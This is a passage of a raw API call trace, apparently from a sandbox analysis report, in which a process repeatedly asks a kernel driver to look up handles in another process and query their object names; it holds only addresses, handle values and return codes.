dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.547] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.547] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.547] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.547] PsAcquireProcessExitSynchronization () returned 0x0 [0245.547] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.547] ObReferenceObjectByHandle (in: Handle=0xa9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003acdb30, HandleInformation=0x0) returned 0x0 [0245.547] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.547] PsReleaseProcessExitSynchronization () returned 0x2 [0245.547] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.547] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.547] ObfDereferenceObject (Object=0xfffffa8003acdb30) returned 0x1 [0245.547] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.548] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.548] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.548] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.548] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.548] PsAcquireProcessExitSynchronization () returned 0x0 [0245.548] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.548] ObReferenceObjectByHandle (in: Handle=0xac0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f9c5f0, HandleInformation=0x0) returned 0x0 [0245.548] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.548] PsReleaseProcessExitSynchronization () returned 0x2 [0245.548] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.548] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.548] ObfDereferenceObject (Object=0xfffffa8001f9c5f0) returned 0x1 [0245.548] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.548] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.548] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.548] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xaa, lpOverlapped=0x0) returned 1 [0245.548] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.548] PsAcquireProcessExitSynchronization () returned 0x0 [0245.548] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.548] ObReferenceObjectByHandle (in: Handle=0xae4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a5a070, HandleInformation=0x0) returned 0x0 [0245.548] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.548] PsReleaseProcessExitSynchronization () returned 0x2 [0245.548] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.548] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.548] ObfDereferenceObject (Object=0xfffffa8003a5a070) returned 0x1 [0245.549] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.549] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.549] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.549] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.549] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.549] PsAcquireProcessExitSynchronization () returned 0x0 [0245.549] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.549] ObReferenceObjectByHandle (in: Handle=0xaf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a5abb0, HandleInformation=0x0) returned 0x0 [0245.549] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.549] PsReleaseProcessExitSynchronization () returned 0x2 [0245.549] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.549] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.549] ObfDereferenceObject (Object=0xfffffa8003a5abb0) returned 0x1 [0245.549] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.549] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.549] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.549] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.549] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.549] PsAcquireProcessExitSynchronization () returned 0x0 [0245.549] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.549] ObReferenceObjectByHandle (in: Handle=0xb08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028141b0, HandleInformation=0x0) returned 0x0 [0245.549] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.549] PsReleaseProcessExitSynchronization () returned 0x2 [0245.549] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.549] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.549] ObfDereferenceObject (Object=0xfffffa80028141b0) returned 0x1 [0245.549] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.550] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.550] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.550] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.550] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.550] PsAcquireProcessExitSynchronization () returned 0x0 [0245.550] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.550] ObReferenceObjectByHandle (in: Handle=0xb2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017affc0, HandleInformation=0x0) returned 0x0 [0245.550] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.550] PsReleaseProcessExitSynchronization () returned 0x2 [0245.550] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.550] ObQueryNameString (in: Object=0xfffff8a0017affc0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.550] ObfDereferenceObject (Object=0xfffff8a0017affc0) returned 0x1 [0245.550] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.550] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.550] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.550] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.550] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.550] PsAcquireProcessExitSynchronization () returned 0x0 [0245.550] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.550] ObReferenceObjectByHandle (in: Handle=0xb30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800213ecd0, HandleInformation=0x0) returned 0x0 [0245.550] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.550] PsReleaseProcessExitSynchronization () returned 0x2 [0245.550] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.550] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.550] ObfDereferenceObject (Object=0xfffffa800213ecd0) returned 0x1 [0245.550] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.550] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.550] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.550] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.550] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.550] PsAcquireProcessExitSynchronization () returned 0x0 [0245.551] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.551] ObReferenceObjectByHandle (in: Handle=0xb34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017f3da0, HandleInformation=0x0) returned 0x0 [0245.551] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.551] PsReleaseProcessExitSynchronization () returned 0x2 [0245.551] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.551] ObQueryNameString (in: Object=0xfffff8a0017f3da0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.551] ObfDereferenceObject (Object=0xfffff8a0017f3da0) returned 0x1 [0245.551] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.551] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.551] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.551] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.551] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.551] PsAcquireProcessExitSynchronization () returned 0x0 [0245.551] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.551] ObReferenceObjectByHandle (in: Handle=0xb38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020b4f20, HandleInformation=0x0) returned 0x0 [0245.551] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.551] PsReleaseProcessExitSynchronization () returned 0x2 [0245.551] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.551] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.551] ObfDereferenceObject (Object=0xfffffa80020b4f20) returned 0x1 [0245.551] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.551] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.551] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.551] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.552] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.552] PsAcquireProcessExitSynchronization () returned 0x0 [0245.552] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.552] ObReferenceObjectByHandle (in: Handle=0xb3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001541910, HandleInformation=0x0) returned 0x0 [0245.552] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.552] PsReleaseProcessExitSynchronization () returned 0x2 [0245.552] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.552] ObQueryNameString (in: Object=0xfffff8a001541910, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.552] ObfDereferenceObject (Object=0xfffff8a001541910) returned 0x1 [0245.552] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.552] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.552] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.552] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0245.552] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.552] PsAcquireProcessExitSynchronization () returned 0x0 [0245.552] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.552] ObReferenceObjectByHandle (in: Handle=0xb40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800200fcb0, HandleInformation=0x0) returned 0x0 [0245.552] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.552] PsReleaseProcessExitSynchronization () returned 0x2 [0245.552] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.552] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.552] ObfDereferenceObject (Object=0xfffffa800200fcb0) returned 0x1 [0245.552] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.552] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.552] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.553] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.553] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.553] PsAcquireProcessExitSynchronization () returned 0x0 [0245.553] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.553] ObReferenceObjectByHandle (in: Handle=0xb44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001819120, HandleInformation=0x0) returned 0x0 [0245.553] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.553] PsReleaseProcessExitSynchronization () returned 0x2 [0245.553] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.553] ObQueryNameString (in: Object=0xfffff8a001819120, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.553] ObfDereferenceObject (Object=0xfffff8a001819120) returned 0x1 [0245.553] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.553] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.553] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.553] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.553] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.553] PsAcquireProcessExitSynchronization () returned 0x0 [0245.553] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.553] ObReferenceObjectByHandle (in: Handle=0xb48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800203e570, HandleInformation=0x0) returned 0x0 [0245.553] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.553] PsReleaseProcessExitSynchronization () returned 0x2 [0245.553] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.553] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.553] ObfDereferenceObject (Object=0xfffffa800203e570) returned 0x1 [0245.553] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.553] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.553] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.554] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.554] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.554] PsAcquireProcessExitSynchronization () returned 0x0 [0245.554] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.554] ObReferenceObjectByHandle (in: Handle=0xb4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001819ac0, HandleInformation=0x0) returned 0x0 [0245.554] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.554] PsReleaseProcessExitSynchronization () returned 0x2 [0245.554] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.554] ObQueryNameString (in: Object=0xfffff8a001819ac0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.554] ObfDereferenceObject (Object=0xfffff8a001819ac0) returned 0x1 [0245.554] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.554] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.554] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.554] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0245.554] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.554] PsAcquireProcessExitSynchronization () returned 0x0 [0245.554] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.554] ObReferenceObjectByHandle (in: Handle=0x11f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028508b0, HandleInformation=0x0) returned 0x0 [0245.554] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.554] PsReleaseProcessExitSynchronization () returned 0x2 [0245.554] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.554] ObQueryNameString (in: Object=0xfffffa80028508b0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.554] ObfDereferenceObject (Object=0xfffffa80028508b0) returned 0x11 [0245.554] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.554] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.554] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.555] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, 